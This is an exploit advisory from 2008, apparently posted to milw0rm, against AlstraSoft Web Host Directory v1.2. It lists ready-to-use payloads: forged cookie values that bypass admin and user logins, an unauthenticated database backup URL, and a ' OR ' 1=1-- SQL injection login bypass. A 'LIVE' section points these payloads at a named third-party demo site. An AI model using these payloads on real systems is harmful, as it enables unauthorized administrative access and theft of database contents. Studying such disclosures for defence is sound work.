==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities
==============================================================================
[»] Script: [ AlstraSoft Web Host Directory v1.2 ]
[»] Language: [ PHP ]
[»] Website: [ http://alstrasoft.com/webhost.htm ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 14.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
===[ DTLZ ]===
[0] Insecure Cookie Handling
[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
[»] javascript:document.cookie = "adm=1";
[!] users Auth bypass
[»] javascript:document.cookie = "logged=[username]";
javascript:document.cookie = "logged=g4n0k";
[1] Arbitrary Database Backup
[!] we can download a Backup of Database.
[»] http://localhost/[paht]/admin/backup/db
[2] SQLi Auth Bypass
[»] Username : [a_valid_username]
[»] Password : ' OR ' 1=1--
===[ LIVE ]===
[»] http://www.hyperstop.com/demo/webhost/
username: testtest
password: ' OR ' 1=1--
javascript:document.cookie = "logged=testtest";
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-14]